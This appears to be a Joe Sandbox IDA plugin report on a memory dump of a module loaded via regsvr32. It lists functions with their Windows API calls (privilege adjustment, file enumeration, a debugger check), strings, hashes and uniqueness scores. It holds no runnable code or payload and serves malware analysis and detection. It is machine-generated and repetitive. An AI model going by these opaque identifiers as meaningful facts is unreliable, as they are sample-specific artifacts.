Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLastProcessToken_invalid_parameter_noinfo_noreturn$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: 61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9
API String ID: 3248160585-2762331935
Opcode ID: fea1cafa03c454daab4362a1ddf5f1b8b2872c5ee5d5667a273a23862cb6609d
Instruction ID: 3017ef7f0be8ba50c541df2c61334f52c4726116b0f318e042369fd49e2595a7
Opcode Fuzzy Hash: fea1cafa03c454daab4362a1ddf5f1b8b2872c5ee5d5667a273a23862cb6609d
Instruction Fuzzy Hash: B04198B2A18786C2EB10CF94F44476DA3A1FB84794F945139DA9D976A9DFBCF048C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB6BB0, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 381fileUNIQUE

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF983DB6C18
FindClose.KERNEL32 ref: 00007FF983DB70D5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB716A

Part of subcall function 00007FF983D931E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D93263

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7176
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7182
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7188

Strings

>> , xrefs: 00007FF983DB6BB6
\, xrefs: 00007FF983DB6C70

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Find$CloseFileFirst
String ID: >> $\
API String ID: 422238183-1673512177
Opcode ID: 909e8305dac6507894ea191d9e1c780f4f4c2329533fc2a8ac428fc02089b329
Instruction ID: 8f8647330ba09bf1cda484a0b6007e9acaa39c9c57a19674d813890c87b009db
Opcode Fuzzy Hash: 909e8305dac6507894ea191d9e1c780f4f4c2329533fc2a8ac428fc02089b329
Instruction Fuzzy Hash: 2702D3A2A08B8085EB00CBA4E44076E77B1FB85B94F544239DB9D5B7D9DFBCE498C740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD1110, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 329timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF983DD114B

Part of subcall function 00007FF983DD69EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD6A00

_get_daylight.LIBCMT ref: 00007FF983DD113A

Part of subcall function 00007FF983DD6A4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD6A60

_get_daylight.LIBCMT ref: 00007FF983DD133B
_get_daylight.LIBCMT ref: 00007FF983DD134C
_get_daylight.LIBCMT ref: 00007FF983DD135D
GetTimeZoneInformation.KERNEL32 ref: 00007FF983DD1384

Strings

?, xrefs: 00007FF983DD1456

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
String ID: ?
API String ID: 435049134-1684325040
Opcode ID: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
Instruction ID: 91cb9c4910a16b98ea4f54fdf8b8a43a3a480d3caa5f0eafeb8c2956e40aa75d
Opcode Fuzzy Hash: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
Instruction Fuzzy Hash: 13D1C0A2A082468BE750DFA19441BB93B90FB44794FC86539EA4FE7696CF7CF449C700

Uniqueness

Uniqueness Score: 16.53%

Function 00007FF983D91290, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102UNIQUE

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 00007FF983D912BF
GetNativeSystemInfo.KERNEL32 ref: 00007FF983D912FD

Strings

d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D9131D

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
API String ID: 2296905803-2598894011
Opcode ID: ba4b7919b10e4de7279c42c6f33d4ef792b1b49a38aeef2924089d27d7593ea7
Instruction ID: a8dc1c86787f941233dcb2cbde4e39f3e44f9d15396eadfd3c7877a666e353d1
Opcode Fuzzy Hash: ba4b7919b10e4de7279c42c6f33d4ef792b1b49a38aeef2924089d27d7593ea7
Instruction Fuzzy Hash: 3D41CA62A187C181E610DB65F48476E73A1FB857D0F945139EA8DA3BA9DF7CF184C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB66E0, Relevance: 9.3, APIs: 6, Instructions: 293fileUNIQUE

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF983DB67AA
FindNextFileW.KERNEL32 ref: 00007FF983DB67C8
WideCharToMultiByte.KERNEL32 ref: 00007FF983DB6B0F

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileFind$ByteCharFirstMultiNextWide
String ID:
API String ID: 2913819974-0
Opcode ID: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
Instruction ID: 97bc5cee2eef512befdfec5772990af1cfc2e311d7bb4dadda9493d7bc929b17
Opcode Fuzzy Hash: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
Instruction Fuzzy Hash: 6AD1A1A661968195EB21DF64C451BFA73B0FB44B44FC8903AD64E9B684EF7CE24DC700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD6D08, Relevance: 9.2, APIs: 6, Instructions: 223UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD6D2A
_get_daylight.LIBCMT ref: 00007FF983DD6D86
_get_daylight.LIBCMT ref: 00007FF983DD6D97
_get_daylight.LIBCMT ref: 00007FF983DD6DA8
_isindst.LIBCMT ref: 00007FF983DD6DF9
_isindst.LIBCMT ref: 00007FF983DD6E4C

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: b1158d2bc6066d46eac873c6fdbe1d47e665daa6a48f767a0990f346a00cf09b
Instruction ID: 30dc78403f07cee2caedb649577e425d8024911f2f4d480621905225042fc2e1
Opcode Fuzzy Hash: b1158d2bc6066d46eac873c6fdbe1d47e665daa6a48f767a0990f346a00cf09b
Instruction Fuzzy Hash: 0281C5F2B042464BDB58CFB5C941BA83695FB54788F889039EA0EDA789EE7CF505C740

Uniqueness

Uniqueness Score: 23.02%

Function 00007FF983DBDEB8, Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF983DBDF31
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF983DBDF49
RtlVirtualUnwind.KERNEL32 ref: 00007FF983DBDF84
IsDebuggerPresent.KERNEL32 ref: 00007FF983DBDFBD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF983DBDFC7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF983DBDFD2

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 2f607030710425d66146b00b3c78e4c22e2448df10010c97ea769bd7889ac1ef
Instruction ID: 6bc6c202a87dc57c41e64383ea8f288c0aab0b895460abf47b4c515586bce66a
Opcode Fuzzy Hash: 2f607030710425d66146b00b3c78e4c22e2448df10010c97ea769bd7889ac1ef
Instruction Fuzzy Hash: 7A318376618B8186DB60CF64E8407BD73A4FB88758F940139EA8E97B94DF7CE549CB00

Uniqueness

Uniqueness Score: 0.46%

Function 00007FF983DD1318, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF983DD133B

Part of subcall function 00007FF983DD6A4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD6A60

_get_daylight.LIBCMT ref: 00007FF983DD134C

Part of subcall function 00007FF983DD69EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD6A00

_get_daylight.LIBCMT ref: 00007FF983DD135D

Part of subcall function 00007FF983DD6A1C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD6A30

Part of subcall function 00007FF983DD1DB4: HeapFree.KERNEL32 ref: 00007FF983DD1DCA

GetTimeZoneInformation.KERNEL32 ref: 00007FF983DD1384

Strings

?, xrefs: 00007FF983DD1456

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$FreeHeapInformationTimeZone
String ID: ?
API String ID: 428190724-1684325040
Opcode ID: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
Instruction ID: a0bf641d6fb8905d5c0ed3b35d27892b853fb4a07bc55d93874116b99cf71ee8
Opcode Fuzzy Hash: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
Instruction Fuzzy Hash: 7D61AFB2A0864287E760DF61E840BA976A4FB44794FC81139EA4EE3A95DF7CF449C740

Uniqueness

Uniqueness Score: 16.53%

Function 00007FF983DD48EC, Relevance: 7.8, APIs: 5, Instructions: 321fileUNIQUE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00007FF983DD495B
WriteFile.KERNEL32 ref: 00007FF983DD4C05
WriteFile.KERNEL32 ref: 00007FF983DD4C57
GetLastError.KERNEL32 ref: 00007FF983DD4D99
GetLastError.KERNEL32 ref: 00007FF983DD4DAB

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite$Console
String ID:
API String ID: 786612050-0
Opcode ID: 7807529073b691e6cdb393a9a913506459aaaee20116e96a684b7cbd462e4bfe
Instruction ID: f0b8f2a73fe9d177cecbaf8474f4b3675a9ef3aaa0dc8a309edf2eccc43bb009
Opcode Fuzzy Hash: 7807529073b691e6cdb393a9a913506459aaaee20116e96a684b7cbd462e4bfe
Instruction Fuzzy Hash: 1BD106B2B08A819AE741CFA4D5447ED77B1FB44788B994139DE4F97B89DE78E01AC300

Uniqueness

Uniqueness Score: 23.02%

Function 00007FF983DC85A0, Relevance: 4.8, APIs: 3, Instructions: 317COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF983DC8606
memcpy_s.LIBCPMT ref: 00007FF983DC8631

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 7037ed090fe5037cd86f1eb86cd94437b19f8eb8756befcb1912c66ca55b3f89
Instruction ID: ad9e631d1967e68d2a6a44305f25eebddb68471ffacfe41355917a7f6a7a65d7
Opcode Fuzzy Hash: 7037ed090fe5037cd86f1eb86cd94437b19f8eb8756befcb1912c66ca55b3f89
Instruction Fuzzy Hash: 54C1B5B2A2828687DB24CF65E144F69B791F794784F988139DB4F93784DA7CF806CB40

Uniqueness

Uniqueness Score: 0.46%

Function 00007FF983DCC714, Relevance: 4.8, APIs: 3, Instructions: 252COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DCC753
_get_daylight.LIBCMT ref: 00007FF983DCC9C6
_get_daylight.LIBCMT ref: 00007FF983DCC9D7

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID:
API String ID: 1286766494-0
Opcode ID: 4b7902a0867223c8bb6774bec9deb4d3dadb0478a3feb4c1dbec732afa533098
Instruction ID: b9c737cf3992aa5cfbcb02e1796e1fdc844abf8df30288162c0df9549d09c2dd
Opcode Fuzzy Hash: 4b7902a0867223c8bb6774bec9deb4d3dadb0478a3feb4c1dbec732afa533098
Instruction Fuzzy Hash: 98919EA2F2561285EE18CAB5D550BB962A0BF54748F884139DE0FE7795EFADF40BC300

Uniqueness

Uniqueness Score: 7.75%

Function 00007FF983DD22A4, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD2308

Strings

gfffffff, xrefs: 00007FF983DD25A5

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: 458cad0f7dfa7b366713080c5b4a286e7047a7fc511e2f3888d5a880ce994ccc
Instruction ID: 3479a6b9249024818e345f4e9299b68a94362eeb50510c45a060f5311af07d43
Opcode Fuzzy Hash: 458cad0f7dfa7b366713080c5b4a286e7047a7fc511e2f3888d5a880ce994ccc
Instruction Fuzzy Hash: C49154A2B097C587EB11CB659410BBD77A4BB64B84F498036CE4E97781EE7DF50AC300

Uniqueness

Uniqueness Score: 2.84%

Function 00007FF983DD2B3C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD2B6D

Part of subcall function 00007FF983DBE11C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF983DBE125
Part of subcall function 00007FF983DBE11C: GetCurrentProcess.KERNEL32 ref: 00007FF983DBE14A

Strings

-, xrefs: 00007FF983DD2D48

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: -
API String ID: 4036615347-2547889144
Opcode ID: 075ee9569f13d2f21254a51ebf6a57380c8f5e67d272522593fce02a84dfa4e3
Instruction ID: bc7c941f96a8076a412c066918ac0786e1aa78585e1497a4f67b4493a9e8e448
Opcode Fuzzy Hash: 075ee9569f13d2f21254a51ebf6a57380c8f5e67d272522593fce02a84dfa4e3
Instruction Fuzzy Hash: AC810AB1A0878587E664CB959500B7A7690FB557D0F884239EA9E93BDDDFBCF408C700

Uniqueness

Uniqueness Score: 23.02%

Function 00007FF983DD82F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD8320

Part of subcall function 00007FF983DBE11C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF983DBE125
Part of subcall function 00007FF983DBE11C: GetCurrentProcess.KERNEL32 ref: 00007FF983DBE14A

Strings

*?, xrefs: 00007FF983DD8347

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: *?
API String ID: 4036615347-2564092906
Opcode ID: b6e8f18e9d65f428ddcdbed1dc67db366eadd2802df8b3d930f982bc76d888d4
Instruction ID: 81cd15c800c9d0b7b1d6851c14396b66e37634d399a6a12d09e7b542947ed48c
Opcode Fuzzy Hash: b6e8f18e9d65f428ddcdbed1dc67db366eadd2802df8b3d930f982bc76d888d4
Instruction Fuzzy Hash: 2151C4A2F1465586EF11CBA5D800BA937A1FB44BD4B888539DE0E97B45DFBCE009C300

Uniqueness

Uniqueness Score: 37.75%

Function 00007FF983DD7570, Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF983DD77BF
RaiseException.KERNEL32 ref: 00007FF983DD77D0

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: f76a7fff9e9006fec5a7f28d3e473eb1a051618ed68587681aaadfa59f69b656
Instruction ID: 0e08cfb30ee2c16bb6ec57e3033f8a241e42b678672aea0d7ef30af432c2f497
Opcode Fuzzy Hash: f76a7fff9e9006fec5a7f28d3e473eb1a051618ed68587681aaadfa59f69b656
Instruction Fuzzy Hash: C6B18FB7600B858BEB15CF2DC88276C37A0F744B48F588869DB5E9B7A4CB79E455C700

Uniqueness

Uniqueness Score: 0.84%

Function 00007FF983DDBE4C, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF983DDBEB0

Part of subcall function 00007FF983DDE83C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDE850

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _get_daylight_invalid_parameter_noinfo
String ID:
API String ID: 474895018-0
Opcode ID: 59f9ca4d831363a2e04a1a8e7ab25de8e6b71d25088e3a8ec7b379f91e7998d5
Instruction ID: 9c2bd2be538b0f58ff9bc5de27c2ebc0ec23554bdf71f0d35f8c3c0db443c48e
Opcode Fuzzy Hash: 59f9ca4d831363a2e04a1a8e7ab25de8e6b71d25088e3a8ec7b379f91e7998d5
Instruction Fuzzy Hash: A871E7A2A0824247F734C9E99450B397291BF403A4F9C463DDA5FE76D5DEBEF44ACA00

Uniqueness

Uniqueness Score: 1.34%

Function 00007FF983DD84FC, Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851cd6f7f6af73753dbd0bf78275a01ea245d8e9319f9f88278bd328b5183a78
Instruction ID: 962e7a8090308b3020fad7aede94e128cfaf9d6bea6d273c6d07d0735e7452b7
Opcode Fuzzy Hash: 851cd6f7f6af73753dbd0bf78275a01ea245d8e9319f9f88278bd328b5183a78
Instruction Fuzzy Hash: D251DB62B0879155F720DBB5E900BAD7BA5BB407D4F988138EE5EA7A85CF7CE109C700

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DBF76C, Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF983DBF93B

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 6a5c209e88f6745588820d8e95aa97d63c799d7da624935c248ba6461d0ae551
Instruction ID: d1fb51bc505adf5ba6d7b65a91f1138c67d8526aaa179b26ef4992ef9f0a53f9
Opcode Fuzzy Hash: 6a5c209e88f6745588820d8e95aa97d63c799d7da624935c248ba6461d0ae551
Instruction Fuzzy Hash: CE71D6DAA1820252EB68DA655000F7D2698FF40744FCC5139DDCBBB699CFADF85BC604

Uniqueness

Uniqueness Score: 0.03%

Function 00007FF983DBF504, Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF983DBF69D

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

